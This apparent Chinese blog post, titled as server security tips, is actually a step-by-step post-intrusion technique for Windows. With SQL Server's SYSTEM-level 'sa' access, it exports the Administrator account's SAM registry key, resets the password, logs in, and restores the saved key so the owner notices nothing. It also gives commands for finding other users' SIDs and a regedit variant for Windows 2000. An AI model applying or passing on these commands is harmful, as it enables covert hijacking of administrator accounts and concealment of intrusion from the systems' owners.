服务器安全设置小技巧

admin 2019-10-13 18:13:08 阅读() 评论()

1. sa默认是SYSTEM权限，可以读sam键. reg export HKLM/SAM/SAM/Domains/Account/Users/000001F4 c:/trace.reg net user administrator test 用administrator登陆. 用…

1.
sa默认是SYSTEM权限，可以读sam键.
reg export HKLM/SAM/SAM/Domains/Account/Users/000001F4 c:/trace.reg
net user administrator test
用administrator登陆.
用完机器后
reg import c:/trace.reg
这样就不用克隆，用管理员帐户即可.

2.
如果没用默认的administrator，可以用下面的方法找到对应的sid.
regedit /e c:/test.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names/用户名

3.
2000系统不存在REG，用Regedit更具有通用性
regedit /e c:/trace.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4
regedit要写完整路径，不可以用HKLM代替HKEY_LOCAL_MACHINE
完事后用regedit /s c:/trace.reg恢复原来的键值。